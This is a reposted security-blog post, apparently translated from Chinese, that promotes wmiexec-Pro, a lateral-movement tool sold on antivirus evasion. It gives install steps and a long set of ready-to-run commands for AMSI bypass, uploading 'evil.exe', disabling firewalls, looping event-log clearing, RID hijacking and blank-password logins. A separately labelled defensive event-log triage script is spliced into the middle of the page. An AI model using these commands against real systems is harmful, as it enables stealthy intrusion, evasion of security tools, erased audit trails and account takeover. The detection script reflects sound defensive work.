A new-generation AV-evading wmiexec for internal lateral movement

admin · 2024-07-04 15:01:39 · 63 views · 6,099 characters · 20 min 19 s read

0x01 Tool introduction

A new-generation wmiexec.py with more features: every operation goes through port 135 only (no SMB connection is needed), with AV evasion (Windows Defender, Huorong, 360) during lateral movement.

0x02 Main features

  • Main feature: AV evasion

  • Main characteristic: no Win32_Process needed

  • Main feature: only port 135 is required

  • New module: AMSI bypass

  • New module: file transfer

  • New module: remotely enable RDP via WMI class methods

  • New module: Windows Firewall abuse

  • New module: looping event log clean-up

  • New module: remotely enable WinRM without touching CMD

  • New module: service manager

  • New module: RID hijacking

  • Enhancement: obtain command execution output in a new way

  • Enhancement: execute VBS files

0x03 Installation and usage

Installation

git clone https://github.com/fortra/impacket
cd impacket && sudo pip3 install .
git clone https://github.com/XiaoliChan/wmiexec-Pro

Usage

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run

Enable/disable amsi bypass:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
  python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable

Execute command:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Silent mode in old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
  python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)

Filetransfer:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)

RDP:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
  python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
  python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable

Firewall (Only support win8+):
  python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
  python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)

Services:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
  python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json

Eventlog:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping cleaning eventlog)

RID Hijack:
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
  python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)
  python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
  python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
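The module list above maps onto a small set of host artefacts a defender can watch for: the looping event-log clean-up produces audit-log-cleared records, the service manager produces service-installed records, the firewall module produces firewall-rule-change records, and RID hijacking rewrites the per-user key under the SAM hive. Because the tool claims to work over port 135 alone, SMB-based signals (ADMIN$ share access, named pipes) will not fire, so the correlation has to start from the network logon itself. The following is an added defender-side example, not code from this page or from the wmiexec-Pro project. It triages a constructed batch of simplified Windows event records (the event IDs are the standard Windows ones; the record layout, logon IDs, addresses and timestamps are constructed for the example) and links each sensitive event back to the network logon that preceded it.

```python
"""Triage constructed Windows event records for the artefacts left by the
module families listed above (log clearing, service install, firewall rule
changes, SAM user-key edits), correlated to a preceding network logon.

Added example, not part of wmiexec-Pro. Record shape is a simplified
constructed dict, not an EVTX export; event IDs are the real Windows ones.
"""

# Standard Windows event IDs (channel, id).
LOG_CLEARED = {("Security", 1102), ("System", 104)}
SERVICE_INSTALLED = {("System", 7045), ("Security", 4697)}
FIREWALL_RULE_CHANGE = {("Security", 4946), ("Security", 4947), ("Security", 4948)}
# RID hijacking rewrites the F value of the victim RID under this SAM path.
SAM_USERS_PATH = r"\SAM\SAM\DOMAINS\ACCOUNT\USERS"


def classify(ev):
    """Return a finding label for one event record, or None if uninteresting."""
    key = (ev["channel"], ev["id"])
    data = ev["data"]
    if key in LOG_CLEARED:
        return "event log cleared"
    if key in SERVICE_INSTALLED:
        return "service installed: " + data.get("ServiceName", "?")
    if key in FIREWALL_RULE_CHANGE:
        return "firewall rule changed: " + data.get("RuleName", "?")
    if key == ("Security", 4657) and SAM_USERS_PATH in data.get("ObjectName", "").upper():
        return "SAM user key modified (possible RID hijack)"
    return None


def triage(events, window_s=300):
    """Flag sensitive events and link them to a network logon (4624, type 3)
    seen within window_s seconds under the same logon ID.

    System-channel records (7045, 104) carry no SubjectLogonId, so they are
    reported but left unlinked; the analyst joins them by time instead.
    """
    logons = {}      # TargetLogonId -> (ts, source ip, user)
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        d = ev["data"]
        if (ev["channel"], ev["id"]) == ("Security", 4624) and d.get("LogonType") == 3:
            logons[d["TargetLogonId"]] = (ev["ts"], d.get("IpAddress", "-"), d.get("TargetUserName", "?"))
            continue
        label = classify(ev)
        if label is None:
            continue
        origin = logons.get(d.get("SubjectLogonId"))
        if origin and ev["ts"] - origin[0] <= window_s:
            findings.append({"ts": ev["ts"], "label": label, "user": origin[2],
                             "source_ip": origin[1], "linked": True})
        else:
            findings.append({"ts": ev["ts"], "label": label,
                             "user": d.get("SubjectUserName", "?"),
                             "source_ip": None, "linked": False})
    return findings


# Constructed sample records (simplified shape, values invented for the example).
SAMPLE_EVENTS = [
    {"ts": 100, "channel": "Security", "id": 4624,
     "data": {"LogonType": 3, "TargetLogonId": "0x3E7A1",
              "TargetUserName": "administrator", "IpAddress": "192.168.1.50"}},
    {"ts": 160, "channel": "Security", "id": 4657,
     "data": {"SubjectLogonId": "0x3E7A1", "SubjectUserName": "administrator",
              "ObjectName": r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account\Users\000001F5",
              "ObjectValueName": "F"}},
    {"ts": 200, "channel": "Security", "id": 4697,
     "data": {"SubjectLogonId": "0x3E7A1", "SubjectUserName": "administrator",
              "ServiceName": "test", "ServiceFileName": r"C:\windows\system32\calc.exe"}},
    {"ts": 205, "channel": "System", "id": 7045,
     "data": {"ServiceName": "test", "ImagePath": r"C:\windows\system32\calc.exe"}},
    {"ts": 260, "channel": "Security", "id": 1102,
     "data": {"SubjectLogonId": "0x3E7A1", "SubjectUserName": "administrator"}},
    # Benign registry write outside the SAM users path: must not be flagged.
    {"ts": 900, "channel": "Security", "id": 4657,
     "data": {"SubjectLogonId": "0x1A2B3", "SubjectUserName": "SYSTEM",
              "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Example\Setting"}},
    # Interactive logon (type 2): not a remote origin, ignored.
    {"ts": 950, "channel": "Security", "id": 4624,
     "data": {"LogonType": 2, "TargetLogonId": "0x5555",
              "TargetUserName": "alice", "IpAddress": "-"}},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        link = f"from {f['source_ip']}" if f["linked"] else "unlinked"
        print(f"t={f['ts']:>4} {f['label']:<45} user={f['user']} ({link})")
```

Two audit prerequisites decide whether this fires on a real host: 4657 only appears when "Audit Registry" is enabled and a SACL is set on the SAM hive, and 4946 to 4948 need "Audit MPSSVC Rule-Level Policy Change"; 1102 and 7045 are recorded by default. The 4657 match on the SAM users path is deliberately narrow so that ordinary software writes to HKLM\SOFTWARE are not flagged.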
Help

[screenshot: help output]

Command execution

[screenshot: command execution]

File transfer

Upload file

[screenshot: file upload]

Download file

[screenshot: file download]

0x04 Tool download

https://github.com/XiaoliChan/wmiexec-Pro

Originally published on the WeChat official account 李白你好: A new-generation AV-evading wmiexec for internal lateral movement

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. Questions may be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not intercepted; contact details are on the home page).
Posted by admin on 2024-07-04 15:01:39.
Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/1977258.html
